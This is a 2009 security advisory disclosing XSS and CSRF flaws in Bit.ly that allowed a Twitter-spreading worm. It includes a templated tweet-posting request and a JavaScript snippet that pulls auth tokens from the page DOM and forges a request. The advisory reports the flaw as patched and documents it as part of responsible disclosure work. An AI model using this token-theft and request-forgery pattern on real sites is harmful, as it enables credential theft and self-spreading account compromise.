------------------------------------------------------------------------------- Bit.ly / Twitter based worm PoC (XSS, CSRF) ------------------------------------------------------------------------------- Author: Mario Heiderich Date: 2009-06-21 For: Month Of Twitter Bugs Release mode: Responsible disclosure Release date: 2009-07-01 Status: Patched (2009-06-30) CVE: none provided OSVDB: none provided Credit: none provided Severity: moderately critical Vendor reaction: Reaction provided but security issue(s) ignored ------------------------------------------------------------------------------- I. Background ------------------------------------------------------------------------------- Bit.ly (http://bit.ly) is a URL shortening service based on one of the many Betaworks (http://betaworks.com/) projects. Bit.ly was chosen by Twitter to be the official URL shortening service used in the Twitter web interface. Bit.ly is involved in the funding on TweetDeck. News regarding Bit.ly * http://gigaom.com/2009/03/30/betaworks-raises-around-2m-for-bitly-spins-it-out/ * http://www.readwriteweb.com/archives/bitly_alternative_to_tinyurl.php ------------------------------------------------------------------------------- II. Description ------------------------------------------------------------------------------- Bit.ly enables sharing and distributing shortened URLs as well as advanced statistics about usage and more. The interesting part is the possibility to create user accounts, share Twitter login credentials with the Bit.ly application and then post shortened URLs directly to Twitter with one click. Since the Twitter API credentials are stored in the DOM of the Bit.ly website after having logged in it's possible to extract the data via JavaScript and use it in later requests. Bit.ly itself is vulnerable against reflective XSS vulnerabilities in the login form and persistent XSS vulnerabilities requiring user interaction inside the shortened URL overview. This enables: * Stealing login credentials in clear text * Stealing Twitter API data * Infecting arbitrary accounts via CSRF * Propagating the payload via Twitter infecting other users accounts ------------------------------------------------------------------------------- IV. Examples ------------------------------------------------------------------------------- The first code example demonstrates how to log bit.ly users out of their account and steal the login credentials in clear text. Afterwards the user is being logged in again probably without noticing the attack. Part of the attack is the user agent's password manager responsible for pre-filling the login form. Depending on the user agent a timeout might have to be used to get this PoC working. <<<

>>> Now to be able to post shortened URLs to Twitter the request has to be examined - turns out it is a regular GET request looking like this: <<< http://bit.ly/account/tweet ?body=<%THE_MESSAGE_BODY%> &twitter_password=undefined &selected_account_login=<%THE_TWITTER_USERNAME%> &selected_account_type=twitter &token=<%THE_TWITTER_AUTH_TOKEN%> >>> Both required values - Twitter user-name and Twitter auth-token can be extracted right from the DOM of Bit.ly website which is being demonstrated below. The following JavaScript illustrates that - and also how to forge an XHR to fire the request including authentication data and the payload. The message body can of course be chosen freely - and filled with an infected Bit.ly URL or any other payload. <<< var foo = Bitly.token; var bar = SHARE_FORM.linked_accounts[0].account_login; var url = <%SEE_ABOVE%> var foobar = new XMLHttpRequest; with(foobar)open('GET', url),send(null) >>> The body could for example contain a Bit.ly shortened URL that redirects to a website containing the markup shown above. After clicking the link the victim - if logged in into Bit.ly - would be logged out too, get his/her account data stolen and propagate the payload afterwards. ------------------------------------------------------------------------------- V. Conclusion ------------------------------------------------------------------------------- Neither the Twitter API nor most of the Twitter API partners provide good protection for their users against CSRF, XSS and worm-like attacks. The MoTB is supposed to point that out in a maybe rather drastic but - as this example shows - most times only remaining way. Stealing email addresses in combination with passwords can also be the first step in a series of attacks against user accounts since it's easy to create tools that automatically check if and where the collected credentials work too. Even if the impact for the platforms themselves - in this example Bit.ly and Twitter might be rather moderate, the dangers for the trusting users are most mentionable. This document only describes attacks against Bit.ly and Twitter - but tests have proven that almost all popular URL shortening and media distribution services out there are vulnerable against CSRF and XSS attacks - most of the vulnerabilities can be described as low hanging fruits. Those include amongst many others: * ow.ly * is.gd * addthis.com Hopefully the MoTB will not only illustrate the dangers of insecure APIs and API partners regarding XSS, CSRF and worm-like attacks but also enforce vendors to understand and fix the vulnerabilities and risks they created. The currently experienced ignorance regarding security and privacy issues for the registered users is an unacceptable and rather shocking state. ------------------------------------------------------------------------------- VI. Disclusore Timeline ------------------------------------------------------------------------------- * 2009-05-17 Vulnerabilities were found * 2009-05-18 Vendor was contacted * 2009-05-19 Vendor responded * 2009-05-20 Subset of vulnerabilities was fixed * 2009-05-21 Vendor was informed about more existing problems * 2009-06-16 Vendor was contacted again due to lack of response * 2009-06-21 Document was created * 2009-06-21 Vendor was contacted again - this document attached * 2009-07-01 Planned public release for MoTB